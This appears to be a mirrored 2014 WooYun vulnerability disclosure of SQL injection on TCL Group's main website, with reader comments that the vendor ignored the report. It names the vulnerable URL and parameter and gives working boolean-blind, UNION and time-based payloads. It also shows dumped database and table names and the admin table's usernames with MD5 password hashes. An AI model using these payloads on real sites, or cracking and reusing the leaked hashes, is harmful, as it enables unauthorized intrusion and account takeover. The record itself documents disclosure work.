TCL集团股份有限公司主站之SQL注射(管理数据泄漏)

admin

144121
文章

118
评论

2015年6月21日19:53:53评论255 views字数 227阅读0分45秒阅读模式

摘要

2014-09-23：细节已通知厂商并且等待厂商处理中
2014-09-23：厂商已查看当前漏洞内容,细节仅向厂商公开
2014-09-29：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(5) 关注此漏洞

缺陷编号： WooYun-2014-77096

漏洞标题： TCL集团股份有限公司主站之SQL注射(管理数据泄漏)

漏洞作者： ydasn

提交时间： 2014-09-23 19:13

公开时间： 2014-09-29 17:58

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

TCL集团股份有限公司主站之SQL注射一枚

详细说明：

TCL集团股份有限公司主站之SQL注射一枚

漏洞证明：

注入点:http://www.tcl.com/News/detail.html?nid=891

Place: GET

Parameter: nid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: nid=891 AND 4308=4308

Type: UNION query

Title: MySQL UNION query (NULL) - 5 columns

Payload: nid=891 LIMIT 1,1 UNION ALL SELECT NULL, NULL, CONCAT(0x3a7066703a,

0x716a4652456464766467,0x3a686a6b3a), NULL, NULL#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: nid=891 AND SLEEP(5)

web application technology: Nginx

back-end DBMS: MySQL 5.0.11

available databases [3]:

[*] information_schema

[*] tclcms

[*] test

current database: 'tclcms'

current user: '%'

Database: tclcms

[26 tables]

+--------------------------+

| t_about |

| t_development |

| t_email_subscriptions |

| t_investors |

| t_mall_index |

| t_maps |

| t_maps_area |

| t_maps_city |

| t_maps_province |

| t_multimedia |

| t_news |

| t_news_type |

| t_product |

| t_query |

| t_recruitment |

| t_recruitment_enterprise |

| t_series |

| t_series_category |

| t_series_models |

| t_service |

| t_sys_menu |

| t_sys_role |

| t_sys_rolemenu |

| t_sys_roleuserinf |

| t_sys_userinf |

| t_weibo |

+--------------------------+

Database: tclcms

Table: t_sys_userinf

[7 columns]

+-----------------+-------------+

| Column | Type |

+-----------------+-------------+

| active | tinyint(1) |

| createtime | datetime |

| last_login_date | datetime |

| loginname | varchar(50) |

| password | varchar(50) |

| userinfid | int(11) |

| username | varchar(50) |

+-----------------+-------------+

Database: tclcms

Table: t_sys_userinf

[4 entries]

+----------+----------------------------------+

| username | password |

+----------+----------------------------------+

| admin | 6b6b5078b4d67ee55259d1ae59cec7f3 |

| ??????? | 25d55ad283aa400af464c76d713c07ad |

| ?? | 25d55ad283aa400af464c76d713c07ad |

| ?? | 8a49a955ba28a7ac0cce7a916b8eec38 |

+----------+----------------------------------+

虽然3个乱码不过admin不会搜噶

修复方案：

过滤！

版权声明：转载请注明来源 ydasn@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-09-29 17:58

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-09-23 20:03 | 第四维度 ( 实习白帽子 | Rank:90 漏洞数:45 | 将点成线...)

0

mark

1# 回复此人
2014-09-23 20:19 | T0sk ( 实习白帽子 | Rank:34 漏洞数:27 | 低调求发展！)

0

大牛好

2# 回复此人
2014-09-24 09:41 | 紫霞仙子 ( 普通白帽子 | Rank:2302 漏洞数:307 | 没好团队，啥都干不成！！！)

0

TCL一直在忽略，目测这个也是。

3# 回复此人
2014-09-24 11:51 | T0sk ( 实习白帽子 | Rank:34 漏洞数:27 | 低调求发展！)

0

@紫霞仙子管理数据表帐号密码数据库都列了还拒绝吗

4# 回复此人
2014-09-24 14:39 | 紫霞仙子 ( 普通白帽子 | Rank:2302 漏洞数:307 | 没好团队，啥都干不成！！！)

0

@T0sk 有时候shell了都忽略。

5# 回复此人
2014-09-24 19:33 | T0sk ( 实习白帽子 | Rank:34 漏洞数:27 | 低调求发展！)

0

好吧我知道了

6# 回复此人
2014-09-25 09:46 | 紫霞仙子 ( 普通白帽子 | Rank:2302 漏洞数:307 | 没好团队，啥都干不成！！！)

0

@T0sk 都2天过去了。。。。。

7# 回复此人

漏洞概要 关注数(5) 关注此漏洞

缺陷编号： WooYun-2014-77096

漏洞标题： TCL集团股份有限公司主站之SQL注射(管理数据泄漏)

相关厂商： TCL集团财务有限公司

漏洞作者： ydasn

提交时间： 2014-09-23 19:13

公开时间： 2014-09-29 17:58

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 15

漏洞状态： 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ydasn@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(5) 关注此漏洞

危害等级：高

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签：无

漏洞评价(共0人评价):

登陆后才能进行评分